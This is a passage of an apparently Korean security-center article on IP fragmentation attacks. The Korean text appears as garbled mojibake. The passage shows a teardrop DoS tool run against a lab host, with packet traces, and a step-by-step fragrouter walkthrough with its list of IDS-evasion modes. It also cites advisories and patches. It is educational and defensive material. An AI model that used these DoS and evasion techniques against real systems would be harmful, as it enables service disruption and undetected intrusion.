20:04:51.189358 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.189608 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.189864 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.190115 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.190367 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)
20:04:51.190620 insecure.kisa.or.kr > 172.16.2.3: (frag 1109:9@65520)

°ø°Ý´ë»ó½Ã½ºÅÛÀÎ 172.16.2.1 È£½ºÆ®´Â À©µµ¿ì NT 4.0 ½Ã½ºÅÛÀε¥ ÀÌ °ø°ÝÀ¸·Î ÀÎÇØ ½Ã½ºÅÛÀÌ Á¤ÁöµÊÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.

ÀÌ Ãë¾àÁ¡Àº ¿©ÀüÈ÷ À©µµ¿ì NT³ª 2000½Ã½ºÅÛ¿¡ ´ëÇØ °ø°Ý°¡´ÉÇÏ¸ç º¸´Ù ÀÚ¼¼ÇÑ Á¤º¸´Â ´ÙÀ½ ¹®¼­µéÀ» Âü°íÇϱ⠹ٶõ´Ù.

CERTCC-KR ±Ç°í¹®: KA-2000-032

MS À©µµ NT,2000ÀÇ IP Fragment Reassembly°úÁ¤¿¡¼­ÀÇ DoS °ø°Ý Ãë¾àÁ¡

http://www.certcc.or.kr/advisory/ka2000/ka2000-032.txt

Microsoft Security Bulletin (MS00-029)

Patch Available for "IP Fragment Reassembly" Vulnerability

http://www.microsoft.com/technet/security/bulletin/ms00-029.asp

Top

(2) Teardrop, bonk, New Teardrop

Teardrop °ø°Ýµµ ¿ª½Ã fragmentÀÇ ÀçÁ¶ÇÕ °úÁ¤ÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°ÝÀ¸·Î µÎ ¹ø° fragmentÀÇ offsetÀ» Á¶ÀÛÇÏ¿© fragmentµéÀ» ÀçÁ¶ÇÕÇÏ´Â °úÁ¤¿¡¼­ ¹öÆÛ¸¦ ³ÑÃÄ °ãÃľ²°Ô ÇÑ´Ù. Teardrop ÇÁ·Î±×·¥Àº °ãÃľ²Áø offset Çʵ带 °¡Áø fragment¸¦ ¸¸µé¾î ¸ñÇ¥ ½Ã½ºÅÛ¿¡ º¸³»¸ç, fragmentµéÀ» ÀçÁ¶ÇÕÇÏ´Â ¸ñÇ¥ ½Ã½ºÅÛÀÌ Á¤ÁöµÇ°Å³ª ÀçºÎÆÃµÇ°Ô ÇÑ´Ù.

Teardrop °ø°Ý µµ±¸¸¦ ÀÌ¿ëÇÏ¿© º¸ÀÚ.

[root@unsecure DoS]# ./teardrop.linux --help
./teardrop.linux src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]
[root@unsecure DoS]# ./teardrop.linux 1.1.1.1 172.16.2.3 -t 139
[ Binary courtesy: http://www.rootshell.com/ ]
teardrop route|daemon9
Death on flaxen wings:
From: 1.1.1.1.46838
To: 172.16.2.3. 139
Amt: 1
[ b00m ]

À̶§ tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÆÐŶÀ» ¸ð´ÏÅ͸µÇÑ ³»¿ëÀÌ´Ù.

23:29:18.503558 1.1.1.1.51331 > 172.16.2.3.139: udp 28 (frag 242:36@0+)
23:29:18.504693 1.1.1.1 > 172.16.2.3: (frag 242:4@24)

ù ¹ø° fragmentÀÇ »çÀÌÁî°¡ 36Àε¥ µÎ ¹ø° fragmentÀÇ offsetÀÌ 24À̹ǷΠ½Ã½ºÅÛÀº 36¿¡¼­ 24·Î rewindµÇ¾î¾ß¸¸ ÇÑ´Ù. ÀÌ °æ¿ì TCP/IP ½ºÅà ÄÚµåÀÇ ÀϺο¡¼­ fp->lenÀÌ À½¼ö°ªÀ¸·Î ÁÖ¾îÁö¸ç ÀÌ °ªÀÌ memcpy()ÇÔ¼ö¿¡ ÀÇÇØ ´ë´ÜÈ÷ Å« ¾ç¼ö·Î Çؼ®µÇ±â ¶§¹®¿¡ ÀϺΠ¿î¿µÃ¼Á¦´Â ´Ù¸¥ ÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸®¿µ¿ª±îÁö µ¤¾î½á¹ö¸®±âµµ ÇÑ´Ù.

Teardrop °ø°Ý°ú À¯»çÇÑ °ø°ÝÀ¸·Î Bonk, New Teardrop°ú °°Àº °ø°ÝÀÌ ÀÖ´Ù.

Top

4. fragrouter

Fragrouter´Â ³×Æ®¿öÅ© ħÀÔŽÁö½Ã½ºÅÛÀÇ º¥Ä¡¸¶Å·À» À§ÇØ °³¹ßµÈ µµ±¸·Î Dug Song(Çѱ¹ÀÎÀ̸ç Çѱ¹À̸§Àº ¼Û´öÁØÀÌ´Ù.)À̶ó´Â À̸§À¸·Î º¸¾ÈºÐ¾ß¿¡¼­ Àß ¾Ë·ÁÁø ¶Ù¾î³­ ÇØÄ¿(¼±ÀÇÀÇ ÀǹÌ)¿¡ ÀÇÇØ °³¹ßµÇ¾ú´Ù. Dug SongÀÇ È¨ÆäÀÌÁö(http://www.monkey.org/~dugsong)¸¦ ¹æ¹®Çϸé fragrouter ÀÌ¿Ü¿¡µµ dsniffer¿Í °°Àº µµ±¸¿Í ¸î¸î ÈǸ¢ÇÑ ¹®¼­µéµµ ãÀ» ¼ö ÀÖ´Ù.

fragrouter´Â ´Ü¼øÈ÷ ÀϹæÇâÀ¸·Î fragmentingÇÏ´Â ¶ó¿ìÅͶó°í ÇÒ ¼ö Àִµ¥, °ø°ÝÀڷκÎÅÍ IP ÆÐŶµéÀÌ fragrouter¿¡ Àü´ÞµÇ¸é fragrouter¿¡¼­´Â ÀÌ ÆÐŶÀ» fragmentedµÈ µ¥ÀÌÅÍ ½ºÆ®¸²À¸·Î ¹Ù²Ù¾î¼­ ¸ñÇ¥½Ã½ºÅÛ¿¡ Æ÷¿öµùÇØ ÁØ´Ù. fragrouter´Â ÇϳªÀÇ ³×Æ®¿öÅ© ÀÎÅÍÆäÀ̽º·Î ÆÐŶÀ» ¹Þ¾Æ¼­ À̸¦ ´Ù¾çÇÑ ÇüÅ·ΠfragmentationÇÑ ÈÄ µ¿ÀÏ ÀÎÅÍÆäÀ̽º ȤÀº 2°³ ÀÌ»óÀÇ ³×Æ®¿öÅ© ÀÎÅÍÆäÀ̽º·Î °¢°¢ Æ÷¿öµùÇØ ÁÖ´Â ¿ªÇÒÀ» ÇÏ°í ÀÖ´Ù.

Fragrouter¸¦ ÀÌ¿ëÇÏ¿© °ø°Ý½ÃÇèÀ» Çϱâ À§Çؼ­´Â ´ÙÀ½ÀÇ 3´ëÀÇ Àåºñ¸¦ »ç¿ëÇÏ¿´´Ù.

Attacker : 172.16.2.1
Fragrouter : 172.16.2.2
Victim : 172.16.4.80(linux80.kisa.or.k)

Top

´Ü°è 1 :

¸ÕÀú °ø°Ý ½Ã½ºÅÛ¿¡¼­ ¸ñÇ¥½Ã½ºÅÛÀ¸·Î °¡´Â ¸ðµç ÆÐŶÀÌ Fragrouter°¡ ¼³Ä¡µÈ ½Ã½ºÅÛÀ» °ÅÄ¡µµ·Ï ¶ó¿ìÆà Å×À̺íÀ» Á¶Á¤ÇÑ´Ù.

[Attacker]# route add -host 172.16.4.80 gw 172.16.2.2
[Attacker]# netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
172.16.4.80 172.16.2.2 255.255.255.255 UGH 0 0 0 eth0

...

´Ü°è 2 :

Fragrouter°¡ ¼³Ä¡µÈ È£½ºÆ®¿¡¼­ ¸ðµç ÆÐŶÀ» 8¹ÙÀÌÆ®·Î fragmentationÇÏ¿© Æ÷¿öµùÇϵµ·Ï ¼³Á¤ÇÑ´Ù.

[fragrouter-1.6]# ./fragrouter -i eth0 -F1
fragrouter: frag-1: ordered 8-byte IP fragments

´Ü°è 3 :

°ø°Ý ½Ã½ºÅÛ¿¡¼­ ¸ñÇ¥½Ã½ºÅÛÀ¸·Î pingÀ» Àü¼ÛÇÏ¿© º»´Ù.

[Attacker]# ping 172.16.4.80

À̶§ ping ÆÐŶÀº ¹Ù·Î ¸ñÇ¥½Ã½ºÅÛÀ¸·Î Àü¼ÛµÇÁö ¾Ê°í fragrouter·Î Àü¼ÛµÇ¾î 8¹ÙÀÌÆ®·Î fragmentµÇ¾î¼­ Àü¼ÛµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù.

[fragrouter-1.6]# ./fragrouter -F1

fragrouter: frag-1: ordered 8-byte IP fragments

172.16.2.1 > 172.16.4.80: icmp: type 8 code 0 (frag 34908:8@0+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@8+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@16+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@24+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@32+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@40+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@48+)
172.16.2.1 > 172.16.4.80: (frag 34908:8@56)

Top

´Ü°è 4 :

³×Æ®¿öÅ© ¸ð´ÏÅ͸µ °á°ú ¸ñÇ¥½Ã½ºÅÛÀ¸·Î Àü¼ÛµÇ´Â ping ÆÐŶÀÌ ¸ðµÎ 8¹ÙÀÌÆ®·Î fragmentation µÇ¾î Àü¼ÛµÇ°í ÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù. ÀϹÝÀûÀÎ ping µ¥ÀÌÅÍ ÆÐŶÀº 56¹ÙÀÌÆ®·Î fragmentation ¾øÀÌ Àü¼ÛµÈ´Ù.

[root@linux80 hcjung]# tcpdump host 172.16.2.1

tcpdump: listening on eth0

14:10:37.538311 172.16.2.1 > linux80.kisa.or.kr: icmp: echo request (frag 34908:8@0+)
14:10:37.538599 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@8+)
14:10:37.538642 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@16+)
14:10:37.538724 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@24+)
14:10:37.538790 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@32+)
14:10:37.538859 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@40+)
14:10:37.538943 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@48+)
14:10:37.539023 172.16.2.1 > linux80.kisa.or.kr: (frag 34908:8@56)
14:10:37.539575 linux80.kisa.or.kr > 172.16.2.1: icmp: echo reply

À§ÀÇ ¿¹¿¡¼­´Â ping ÆÐŶÀ» Àü¼ÛÇÏ´Â °ÍÀ» º¸¿´Áö¸¸ °ø°Ý¿ë ÆÐŶµµ ¸¶Âù°¡Áö·Î ¾ÆÁÖ ÀÛÀº fragment·Î ³ª´©¾î¼­ Àü¼ÛÀÌ µÈ´Ù.

ÀÌó·³ fragrouter´Â ±× ÀÚü·Î½á´Â °ø°Ýµµ±¸´Â ¾Æ´ÏÁö¸¸ ´Ù¸¥ °ø°Ý½Ã ³×Æ®¿öÅ© ħÀÔŽÁö½Ã½ºÅÛ¿¡ ¹ß°¢µÇÁö ¾Ê°í °ø°ÝÀ» °¡´ÉÇÏ°Ô ÇÑ´Ù. ¿¹¸¦µé¾î À¥¼­¹ö¿¡ phf °ø°ÝÀ» ÇÒ¶§³ª DNS ¼­¹ö¿¡ ¹öÆÛ¿À¹öÇÃ·Î¿ì °ø°ÝÀ» Çϰųª ¾Æ´Ï¸é ´Ù¸¥ Á¾·ùÀÇ °ø°ÝÀ» ÇÒ ¶§ fragrouter¸¦ °°ÀÌ »ç¿ëÇÏ¸é ³×Æ®¿öÅ© ħÀÔŽÁö½Ã½ºÅÛÀ¸·ÎºÎÅÍ ¹ß°¢µÇ´Â °ÍÀ» ÇÇÇÒ ¼ö ÀÖ´Ù.

Fragrouter¿¡¼­ fragmentÇÒ ¼ö ÀÖ´Â ÇüÅ´ ¾Æ·¡¿Í °°ÀÌ ´Ù¾çÇÏ´Ù.

Usage: fragrouter [-i interface] [-p] [-g hop] [-G hopcount] ATTACK

where ATTACK is one of the following:

- B1: base-1: normal IP forwarding
- F1: frag-1: ordered 8-byte IP fragments
- F2: frag-2: ordered 24-byte IP fragments
- F3: frag-3: ordered 8-byte IP fragments, one out of order
- F4: frag-4: ordered 8-byte IP fragments, one duplicate
- F5: frag-5: out of order 8-byte fragments, one duplicate
- F6: frag-6: ordered 8-byte fragments, marked last frag first
- F7: frag-7: ordered 16-byte fragments, fwd-overwriting
- T1: tcp-1: 3-whs, bad TCP checksum FIN/RST, ordered 1-byte segments
- T3: tcp-3: 3-whs, ordered 1-byte segments, one duplicate
- T4: tcp-4: 3-whs, ordered 1-byte segments, one overwriting
- T5: tcp-5: 3-whs, ordered 2-byte segments, fwd-overwriting
- T7: tcp-7: 3-whs, ordered 1-byte segments, interleaved null segments
- T8: tcp-8: 3-whs, ordered 1-byte segments, one out of order
- T9: tcp-9: 3-whs, out of order 1-byte segments
- C2: tcbc-2: 3-whs, ordered 1-byte segments, interleaved SYNs
- C3: tcbc-3: ordered 1-byte null segments, 3-whs, ordered 1-byte segments
- R1: tcbt-1: 3-whs, RST, 3-whs, ordered 1-byte segments
- I2: ins-2: 3-whs, ordered 1-byte segments, bad TCP checksums
- I3: ins-3: 3-whs, ordered 1-byte segments, no ACK set
- M1: misc-1: Windows NT 4 SP2 - http://www.dataprotect.com/ntfrag/
- M2: misc-2: Linux IP chains - http://www.dataprotect.com/ipchains/

Top

5. °á·Ð

IP FragmentationÀº À̱âÁ¾ÀÇ ³×Æ®¿öÅ© ȯ°æ¿¡¼­ IP ÆÐŶÀÇ È¿À²ÀûÀÎ Àü¼ÛÀ» º¸ÀåÇØÁÖ°í ÀÖÁö¸¸ ¾Õ¼­ »ìÆ캻 °Í°ú °°ÀÌ ¸î°¡ÁöÀÇ º¸¾È¹®Á¦¸¦ °¡Áö°í ÀÖ´Ù. ¸¹Àº ÆÐŶ ÇÊÅ͸µ Àåºñ³ª ħÀÔÂ÷´Ü½Ã½ºÅÛ, ħÀÔŽÁö½Ã½ºÅÛ, ±×¸®°í °¢ ¿î¿µÃ¼Á¦ÀÇ IP ½ºÅÃÀÌ IP fragmentation ÀçÁ¶ÇÕÀ» ÀûÀýÈ÷ ó¸®ÇÏÁö ¸øÇÏ°í ÀÖ´Ù.

´ëÇ¥ÀûÀÎ IP FragmentationÀ» ÀÌ¿ëÇÑ °ø°ÝÀÌ Ping of Death, Jolt, teardrop°ú °°Àº ¼­ºñ½º°ÅºÎ°ø°ÝÀÌ´Ù. ÀÌ´Â ¸ñÀûÁö ½Ã½ºÅÛÀÌ ºñÁ¤»óÀûÀÎ fragment¸¦ ÀûÀýÈ÷ ÀçÁ¶ÇÕÇÏÁö ¸øÇÔÀ¸·Î½á ¹ß»ýµÇ¾î ½Ã½ºÅÛÀÌ ÁßÁöµÇ°Å³ª ÀçºÎÆÃµÉ ¼ö ÀÖ´Ù. ÃÖ±Ù¿¡´Â ¿î¿µÃ¼Á¦¿¡¼­´Â IP FragmentationÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ°ø°Ý¿¡ °ßµô ¼ö ÀÖµµ·Ï ÆÐÄ¡°¡ ÀÌ¹Ì µÈ °æ¿ì°¡ ¸¹´Ù.

ÇÏÁö¸¸ ¼­ºñ½º°ÅºÎ°ø°Ýº¸´Ù ÃÖ±Ù¿¡ ´õ ¹®Á¦°¡ µÇ°í ÀÖ´Â °ÍÀº IP FragmentationÀ» ÀÌ¿ëÇÏ¿© ħÀÔÂ÷´Ü½Ã½ºÅÛÀ̳ª ħÀÔŽÁö½Ã½ºÅÛÀ» ¿ìȸÇÒ ¼ö ÀÖ´Â ±â¼úÀÌ´Ù.

ƯÈ÷, Dug Song(¼Û´öÁØ À̶ó´Â Çѱ¹ÀÎ)ÀÌ ³×Æ®¿öÅ©±â¹Ý ħÀÔŽÁö½Ã½ºÅÛ º¥Ä¡¸¶Å·À» À§ÇØ °³¹ßÇÑ fragrouter¶ó´Â ÅøÀº ¸ðµç ÆÐŶÀ» ´Ù¾çÇÑ ÇüÅÂÀÇ fragment·Î ÂÉ°³¾î¼­ Àü¼ÛÇÔÀ¸·Î½á °ø°Ý»ç½ÇÀ» ¼û±æ ¼ö ÀÖ´Ù.

ħÀÔŽÁö½Ã½ºÅÛÀº ħÀÔ»ç½ÇÀ» °áÁ¤Çϱ⿡ ¾Õ¼­ fragmentµÈ ÆÐŶµéÀ» ÀçÁ¶ÇÕÇÏ¿©¾ß¸¸ IP FragmentationÀ» ÀÌ¿ëÇÑ ¿ìȸ°ø°ÝÀÇ Å½Áö°¡ °¡´ÉÇÒ °ÍÀÌ´Ù. ÇÏÁö¸¸ ³×Æ®¿öÅ© ħÀÔŽÁö½Ã½ºÅÛÀÌ fragmentµÈ ÆÐŶÀ» ÀçÁ¶ÇÕÇϱâ À§Çؼ­´Â ¸Þ¸ð¸®, ÇÁ·Î¼¼½º µîÀÇ ¸¹Àº ½Ã½ºÅÛ ÀÚ¿øÀ» ÇÊ¿ä·Î ÇÏ°í ½Ç½Ã°£ ŽÁö°¡ ¾î·Á¿öÁú ¼ö ÀÖ´Â ¹®Á¦°¡ ¹ß»ýµÉ ¼ö ÀÖ´Ù. È£½ºÆ®±â¹ÝÀÇ Ä§ÀÔŽÁö½Ã½ºÅÛ¿¡¼­´Â ÀÌ¹Ì ÀçÁ¶ÇÕµÈ IP µ¥ÀÌÅͱ׷¥À» ºÐ¼®ÇϹǷΠfragment ¹®Á¦°¡ ¹ß»ýµÇÁö ¾ÊÀ¸¹Ç·Î Áß¿ä ¼­¹ö¿¡¼­´Â È£½ºÆ®±â¹ÝÀÇ Ä§ÀÔŽÁö½Ã½ºÅÛ ¿î¿µµµ °í·ÁÇØ º¼ ¸¸ÇÏ´Ù.

6. Âü°í¹®Çå

[1] Stephen Northcutt, Network Intrusion Detection An Analyst's Handbook, New Riders Publishing, 2000

[2] Çѱ¹Á¤º¸º¸È£¼¾ÅÍ, '98 ÇØÅ·ÇöȲ ¹× ´ëÀÀ, Çѱ¹Á¤º¸º¸È£¼¾ÅÍ, 1998

[3] Thomas H. Ptacek, Insertion, Evasion, and Denial of Service:Eluding Network Intrusion Detection, Secure Networks Inc, 1998

[4] Greg Hoglund and Jon Gary, Multiple Levels of De-synchronization and other concerns with testing an IDS system, 2000

[5] Dug Song, NIDSbench, http://www.anzen.com/research/nidsbench/, 1999

[6] Brad Sanford, IP Fragmentation and Fragrouter, http://www.sans.org/infosecFAQ/encryption/IP_frag.html, 2000

Top



     
15   MySQL ¿¡·¯Äڵ庰 ¿¡·¯¸Þ¼¼Áö ÀÔ´Ï´Ù.  1day 05¡¤08¡¤16 474176
14   ÀÎÅͳÝÀÇ »Ñ¸® TCP/IP ³×Æ®¿öÅ© ¹Ù·Î¾Ë±â  1day 04¡¤02¡¤12 38400
13   ·¹µåÇÞ ½Ã½ºÅÛ ÃÖ½ÅÀ¸·Î À¯ÁöÇÏ±â  1day 04¡¤02¡¤03 36409
12   Sendmail ¸ÞÀϼ­¹öÀÇ ½ºÆÔ¸±·¹ÀÌ ´ëÀÀ¹æ¹ý  1day 04¡¤02¡¤01 40809
11   Ä§ÇØ»ç°í ´ëÀÀ¹æ¹ý ¹× ÀýÂ÷  1day 04¡¤02¡¤01 37396
10   ³×Æ®¿öÅ© ½º´ÏÇÎ ±â¼ú ¹× ¹æÁö´ëÃ¥  1day 04¡¤02¡¤01 46181
9   À©µµ¿ì NT¼­¹ö ¹× IIS º¸¾È °ü¸®  1day 04¡¤02¡¤01 47103
8   Solaris Network Kernel Tunning for Security  1day 04¡¤01¡¤31 40999
7   ¾ÈÀüÇÑ À¯´Ð½º ÇÁ·Î±×·¡¹ÖÀ» À§ÇÑ Áöħ¼­ V.0.7  1day 04¡¤01¡¤30 40218
6   Abnormal IP Packets  1day 04¡¤01¡¤28 42405
5   DNS ¾ÈÀü¿î¿ë°¡ÀÌµå  1day 04¡¤01¡¤20 53822
4   MTX ¿ú¹ÙÀÌ·¯½º ºÐ¼® º¸°í¼­  1day 04¡¤01¡¤17 38975
  IP FragmentationÀ» ÀÌ¿ëÇÑ °ø°Ý±â¼úµé  1day 04¡¤01¡¤14 40194
2   ¸®´ª½º ½Ã½ºÅÛ °ü¸®ÀÚ¸¦ À§ÇÑ º¸¾È Áöħ¥°  1day 04¡¤01¡¤14 39376
1   ¿î¿µÃ¼Á¦¿Í Ä¿³Î Â÷¿ø¿¡¼­ÀÇ Æ©´× ¹× º¸..  1day 04¡¤01¡¤11 37023
1
Copyright 1999-2025 Zeroboard / skin by GGAMBO
Copyright (c) 2003~2004 by 1day all rights reserved.